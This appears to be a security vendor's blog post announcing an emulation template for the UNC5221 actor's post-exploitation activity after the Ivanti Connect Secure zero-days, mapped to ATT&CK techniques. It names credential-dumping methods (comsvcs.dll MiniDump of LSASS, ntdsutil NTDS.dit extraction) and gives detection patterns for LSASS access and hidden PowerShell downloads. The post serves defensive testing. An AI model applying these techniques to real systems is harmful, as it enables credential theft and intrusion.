On January 10, 2024, the software company Ivanti disclosed two vulnerabilities impacting Ivanti Connect Secure VPN, formerly Pulse Secure, and Ivanti Policy Secure appliances. Successful exploitation of these vulnerabilities could result in authentication bypass and command injection, leading to further downstream compromise of a victim network.
A day later, on January 11, researchers began to detect evidence of widespread scanning by an entity with knowledge of these vulnerabilities. They observed several file paths, which are not publicly known, being requested via logs present on Ivanti Connect Secure (CS) VPN devices.
On the same day, Ivanti customers began reporting the discovery of mismatched files present on their appliances. In turn, these organizations shared the results of the built-in integrity scan which showed no signs of previous mismatched files.
Several researchers engaged in investigating the exploitation of these zero-day vulnerabilities in the wild by an adversary nicknamed UNC5221, also known as UTA0178. This adversary leveraged multiple custom malware families, in several cases trojanizing legitimate files within the device with malicious code.
AttackIQ has released a new assessment template that emulates the different Tactics, Techniques, and Procedures (TTPs) exhibited by the UNC5221 adversary following the successful exploitation of two zero-day vulnerabilities with the aim of helping customers validate their security controls and their ability to defend against this recent threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
- Assess their security posture against a newly discovered threat which did not carry opportunistic attacks, but aimed to maintain its presence in a subset of high priority targets it compromised after the inevitable release of a patch.
- Continuously validate detection and prevention pipelines against widely known behaviors linked to the exploitation of these vulnerabilities.
UNC5221 – 2024-01 – Ivanti Vulnerability Post-Compromise TTPs
This assessment template emulates the different Tactics, Techniques, and Procedures (TTPs) exhibited by UNC5221 after successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection).
The template is divided into Tactics, and these group the Techniques and Implementations exhibited by UNC5221 during its activities.
1.Discovery: Techniques that adversaries use to discover information related to the compromised environment.
Network Service Discovery (T1046): This scenario uses
nmap for scanning hosts that have open ports for Samba File Sharing (SMB), Remote Desktop (RDP), or Active Directory (LDAP) that would identify remotely accessible hosts to the attacker.
2. Collection: Techniques used by adversaries to collect the discovered information regarding the compromised system.
Archive Collected Data: Archive via Utility (T1560.001): This scenario compresses all the specified input files with the given compression level to a .7z archive by executing the
7zip binary file.
3. Credential Access: Techniques used by adversaries to harvest credentials available on the compromised system.
OS Credential Dumping: LSASS Memory (T1003.001): Uses
comsvcs.dll to call the
MiniDump export that will dump the LSASS process memory to disk. This process contains a variety of credential materials and can be passed to additional dumping tools to extract credentials.
4. Lateral Movement: Consists of the techniques adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it.
Remote Services: Remote Desktop Protocol (T1021.001): Remote Desktop is the built-in remote access utility used by Windows. This scenario attempts to remotely connect to another accessible asset with stolen credentials.
Remote Services: SSH (T1021.004): This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.
5. Command and Control: Techniques that adversaries may use to communicate with systems under their control within a victim network.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Internet Connection Discovery (T1016.001): This scenario validates if the system is capable of accessing the internet by using the native
curl utility to make a request to a legitimate 3rd party site that reports the external IP address used to access the domain.
Opportunities to Expand Emulation Capabilities
In addition to the released assessment template, AttackIQ recommends the following scenarios to extend the emulation of the capabilities exhibited by UNC5221. These scenarios can be selected within the scenario library and executed in the corresponding environments.
- Dump Active Directory Database using ntdsutil.exe (003): This scenario will attempt to execute the
ntdsutil.exeutility to dump the
NTDS.ditfile along with the SYSTEM and SECURITY registry hives. This scenario must be run on a Domain Controller (DC).
- PCAP Replay – SMB Password Spraying: This scenario will simulate an SMB password spraying attack against an SMB server on port 445/TCP. A password spraying attack is a type of brute force attack where a malicious adversary attempts to brute force logins based on a list of usernames with a default or predictable password.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review Ivanti’s Patching and Detection Recommendations:
Ivanti has provided a number of recommendations for defending yourself from the exploitation of this widely known vulnerabilities. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.
2. OS Credential Dumping: LSASS Memory (T1003.001):
Adversaries may attempt to extract user and credential information from the Local Security Authority Subsystem Service (LSASS) process.
Search for executions of comsvcs that attempt to access the LSASS process.
Process Name == (comsvcs)
Command Line CONTAINS (‘lsass’)
MITRE ATT&CK recommends the following mitigation recommendations:
- M1028 – Operating System Configuration
- M1027 – Password Policies
- M1026 – Privileged Account Management
- M1017 – User Training
- M1040 – Behavior Prevention on Endpoint
- M1043 – Credential Access Protection
- M1025 – Privileged Process Integrity
3. Ingress Tool Transfer (T1105):
This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.
The following signatures can help identify when native utilities are being used to download malicious payloads.
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)
MITRE ATT&CK has the following mitigation recommendations.
In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against the activities associated with this threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness.
AttackIQ stands at the ready to help security teams implement this assessment template and other aspects of the AttackIQ Security Optimization Platform, including through our fully managed service, AttackIQ Ready!, and our co-managed security service, AttackIQ Enterprise.